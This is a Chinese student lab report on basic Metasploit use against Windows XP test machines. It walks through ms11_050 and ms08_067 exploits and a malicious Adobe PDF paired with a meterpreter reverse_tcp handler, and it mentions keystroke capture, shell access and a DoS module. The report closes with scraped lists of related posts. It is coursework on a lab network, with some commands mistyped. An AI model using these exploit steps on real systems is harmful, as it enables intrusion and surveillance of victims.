20145223 杨梦云 《网络对抗》 MSF基础应用
20145223 杨梦云 《网路对抗》 MSF基础应用
1、实验后回答问题:用自己的话解释什么是exploit,payload,encode
(1)百度百科上说Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。我自己的理解是,在我们事先发现系统漏洞后,通过一些数据方面的相关设置,最后通过exploit来执行这些设置攻击漏洞。
(2)payload翻译为有效载荷,我们真正攻击漏洞所依靠的就是这些有着特定含义和作用的payloads.
(3)encode就是编码,为了不被靶机中的杀毒软件或防火墙检测到恶意代码的存在,对恶意代码重新进行编码包装,实现免杀。
2、实验总结与体会
这次的实验我感觉其实并不难,只要掌握基本的命令,就可以通过msf实现操作。麻烦的地方在于因为系统的更新换代和防止渗透对漏洞安装了补丁,很多攻击只能在很久以前的系统上进行,有些时候要想实验成功完成可能还需要将系统上安装的漏洞补丁卸载。所以找到合适的靶机其实不太容易,这也说明了随着我们系统安全的不断升级,要想实现真正意义上的攻击是相当有难度的,现在电商绝大部分系统已经是win7或者win10,ie浏览器也已经更新到了版本IE11,如果我们再想通过以前的一些攻击手段,是没有办法实现的。不过这也并不意味着我们的系统已经足够安全,总会有我们没有发现的漏洞在我们的系统中存在着,也总会有新的漏洞在软件的更新后悄然潜入我们的系统当中,网络攻防依然是值得我们去关注的问题。
3、实验过程记录
ms11_050(针对浏览器的攻击)
1、msfconsole
打开msf
2、use windows/browser/ms11_050_mshtml_cobjectelement
找到相对应的target,可攻击的靶机为带有ie 7的xp系统英文版
3、show options
查看需要进行设置的参数
4、设置ip和端口号(kali机ip为192.168.211.132
)
5、showoptions
查看设置结果
6、exploit
生成靶机需要访问的ip地址
7、kali机访问目标地址,结果无法访问
8、msf下可看见创建了一个ID为1的session
9、sessions -i 1
开始连接后抓取靶机键盘
10、获取shell
m08_067(主动攻击)
1、search m08_067
查看渗透模块的相关信息
2、show payloads
查看有效的攻击荷载,这里找到的是shell_reverse_tcp
3、show targets
查看可以被攻击的靶机的操作系统型号,这里我们用的靶机操作系统为windows xp sp3 English
4、设置参数(有效荷载payloads),靶机ip为192.168.211.133
,主机ip为192.168.211.132
(这里ip可以自己设置,但需要两台主机在同一网段,可以相互ping通)
5、exploit
操作系统为windows xp sp3 English的靶机已经被攻击
6、执行```dir``
7、kali机执行ipconfig/all
8、 windows执行同样的操作
Adobe阅读器渗透攻击(针对客户端)
1、kali下打开显示隐藏文件,输入use exploit/windows/fileformat/adobe_cooltype_sing
,然后输入set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷payloads
set LHOST "KALI Ip"
set LPORT xxxx
2、exploit
,生成pdf文件以后拷贝到xp虚拟机
3、back``返回,使用
use exploit/multi/handler```新建一个监听模块。
4、使用set payload windows/meterpreter/reverse_tcp
建立一个反向连接。端口号设置和攻击模块里的数据设置相同。
5、在靶机中打开pdf文件,相当于打开了一个后门程序,这里pdf打不开,因为其中包含了恶意代码
6、反弹链接后成功
7、可以查看靶机操作系统的相关信息,windows xp sp3,64位,中文语言
8、ps
命令 可以查看当前靶机中的系统进程
9、获取靶机系统权限
10、靶机在命令行查看本机tcp连接信息,可以看到与ip地址为192.168.211.132
的kali机通过端口5223建立连接。
应用辅助模块。
1、输入search auxiliary
可以找到许多msf辅助模块,在此基础上缩小范围,输入search auxiliary/dos/windows/ftp
缩小范围,找到可以尝试应用于Windowsxpattacker靶机的模块
2、···use auxiliary/search auxiliary/dos/windows/ftp、iis75_ftpd_iac_bof```进入模块,设置好相应参数后exploit
结果是可以获取靶机IIS7.5版本及以下的FTP客户端FileZilla的相应版本号
3、尝试着另外做了一些其他辅助模块的应用,如m04_045,但是都失败了QAQ:
4、最后应用的是scanner/portscan/ack——ACK防火墙扫描
对靶机扫描tcp的未过滤端口
20145223 杨梦云 《网络对抗》 MSF基础应用的更多相关文章
- 20145223 杨梦云 《网络对抗》 Web安全基础实践
20145223 杨梦云 <网络对抗> Web安全基础实践 1.实验后回答问题 (1)SQL注入攻击原理,如何防御 **原理**:SQL注入攻击是通过构建特殊的输入作为参数传入web应用程 ...
- 20145223 杨梦云 《网络对抗》 Web基础
20145223 杨梦云 <网络对抗> Web基础 1.实验后回答问题 (1)什么是表单 表单在网页中主要负责数据采集功能.一个表单有三个基本组成部分:(1) 表单标签:这里面包含了处理表 ...
- 20145223 杨梦云 《网络对抗》shellcode实验+return-to-libc实验
20145223 杨梦云 <网络对抗>shellcode实验+return-to-libc实验 shellcode注入实践 Shellcode基础知识 ·Shellcode实际是一段代码( ...
- 20155313 杨瀚 《网络对抗技术》实验五 MSF基础应用
20155313 杨瀚 <网络对抗技术>实验五 MSF基础应用 一.实验目的 本实验目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动 ...
- 20155313 杨瀚 《网络对抗技术》实验九 Web安全基础
20155313 杨瀚 <网络对抗技术>实验九 Web安全基础 一.实验目的 本实践的目标理解常用网络攻击技术的基本原理.Webgoat实践下相关实验. 二.基础问题回答 1.SQL注入攻 ...
- 20155313 杨瀚 《网络对抗技术》实验八 Web基础
20155313 杨瀚 <网络对抗技术>实验八 Web基础 一.实验目的 1.Web前端HTML 能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含 ...
- 网络对抗——web基础
网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...
- 20155313 杨瀚 《网络对抗技术》实验一 PC平台逆向破解(5)M
exp1 PC平台逆向破解(5)M 一.实验内容 1.手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数. 2.利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发 ...
- 2017-2018-2 《网络对抗技术》 20155322 Exp 5 MSF基础应用
[-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-情报收集 2.2-主动攻击实践-ms08_067 2.3-浏览器攻击实践-many* ...
随机推荐
- easyui导出当前datagrid数据(Word)
JS代码可参考http://www.cnblogs.com/mu1516633121/p/7753423.html 同样是winform架构下应用到Aspose.Words来读写Word文档 其中Se ...
- NetMQ:.NET轻量级消息队列
前言 首先我现在是在一家游戏工作做服务端的,这几天我们服务端游戏做了整个底层框架的替换,想必做过游戏的也都知道,在游戏里面会有很多的日志需要记录,量也是比较大的:在没有换框架之前我们存日志和游戏运行都 ...
- JavaScript - 表单提交前预览图片
其实这东西网上到处都是,但并不完整. 正好我也遇到了这个问题,不仅仅是预览,还需要得到图片的属性. 于是东凑西凑整理出一个完整的版本,并根据个人的理解加上了一点点说明. 首先做一些准备工作,HTML方 ...
- 游标的小知识(转载and整理)
一.游标(用来存储多条查询数据的一种数据结构(结果集),它有一个指针,用来从上往下移动,从而达到遍历每条记录的作用) 游标也可以理解为逐行返回SQL语句的结果集 如何编写一个游标? 1.声明游标 de ...
- Windbg 脚本命令简介 一
Windbg 脚本命令简介 一 Windbg command r: registers的简写,可以显示或修改寄存器的值.浮点寄存器的值.定义别名变量. 可以显示当前线程下的寄存器值. The r c ...
- maven <resources>标签
<build> <finalName>com_dubbo_config</finalName> <resources> <resource> ...
- 2019 Java面试题
马上又是一个金九银十的招聘旺季,小编在这里给大家整理了一套各大互联网公司面试都喜欢问的一些问题或者一些出场率很高的Java面试题,给在校招或者社招路上的你一臂之力. 首先我们需要明白一个事实,招聘的一 ...
- Tomcat服务器使用(一)
1. Tomcat服务器端口的配置 Tomcat服务器的配置文件主要在conf文件夹中,conf文件夹下的server.xml是配置文件的核心,默认的配置端口是8080,如果想要修改为其他的端口,可在 ...
- javascript之Array()数组函数讲解
Array()是一个用来构建数组的内建构造器函数.数组主要由如下三种创建方式: array = new Array() array = new Array([size]) array = new Ar ...
- ajax提交手机号去数据库验证并返回状态值
<script type="text/javascript"> $(function(){ $('.agree_regi').click(function(){ var ...